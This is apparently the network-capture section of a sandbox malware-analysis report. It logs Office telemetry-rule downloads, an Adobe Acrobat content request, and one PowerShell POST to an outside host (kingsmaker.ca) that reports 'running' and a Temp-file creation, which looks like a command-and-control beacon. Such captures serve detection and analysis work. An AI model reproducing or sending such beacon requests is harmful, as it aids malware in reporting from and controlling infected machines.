                                                                                                                            2024-11-29 07:30:52 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            33192.168.2.54974913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:51 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:52 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                            x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073052Z-174f7845968qj8jrhC1EWRh41s0000000zp0000000000m58
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            34192.168.2.54975113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:51 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:52 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 404
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                            x-ms-request-id: 37db9b91-d01e-0066-0516-41ea17000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073052Z-174f7845968px8v7hC1EWR08ng0000000zxg000000002pxe
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.549755104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:51 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 140
                                                                                                                            2024-11-29 07:30:51 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 61 6c 66 6f 6e 73 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                                                            2024-11-29 07:30:52 UTC994INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVo9JYqtRwZ5yPLzxXm8IjKXOcqtElHGBEWNXEfhPG7deBtmKFJ58NXuvMMc1ZGtvPKnhGX19nIt8XQuzFsCcJrF9BgHLhNoNrF2uFLwBq08P57aanTCYx1xhI7Qj6M9c%2B6lWI5%2FU2pD"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=16578&min_rtt=929&rtt_var=26703&sent=16226&recv=7779&lost=0&retrans=0&sent_bytes=23044737&recv_bytes=128685&delivery_rate=51477501&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e5146b0c72c2-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1965&rtt_var=748&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1084&delivery_rate=1453459&cwnd=164&unsent_bytes=0&cid=71ceeb8955e985e4&ts=774&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            36192.168.2.54975213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:52 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:52 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                            x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073052Z-174f7845968swgbqhC1EWRmnb40000000zpg000000009w2m
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            37192.168.2.54975313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:52 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:52 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 428
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                            x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073052Z-174f7845968pf68xhC1EWRr4h80000000zt0000000009tcy
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:52 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            38192.168.2.54976113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:54 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:54 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                            x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073054Z-174f7845968jrjrxhC1EWRmmrs0000000zpg0000000090xc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            39192.168.2.54976013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:54 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:54 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                            x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073054Z-174f7845968glpgnhC1EWR7uec0000000zsg000000005fnc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            40192.168.2.54976313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:54 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:54 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 494
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                            x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073054Z-174f7845968swgbqhC1EWRmnb40000000zrg000000006srd
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:54 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            41192.168.2.54976213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:54 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:54 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                            x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073054Z-174f7845968n2hr8hC1EWR9cag0000000zbg000000000qc9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.54976552.6.155.204437720C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:55 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                                                                                            Host: p13n.adobe.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Chromium";v="105"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                                            Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                            x-adobe-uuid: 89d789c4-e7e5-4f75-95a4-57139ab6811f
                                                                                                                            x-adobe-uuid-type: visitorId
                                                                                                                            x-api-key: AdobeReader9
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Origin: https://rna-resource.acrobat.com
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
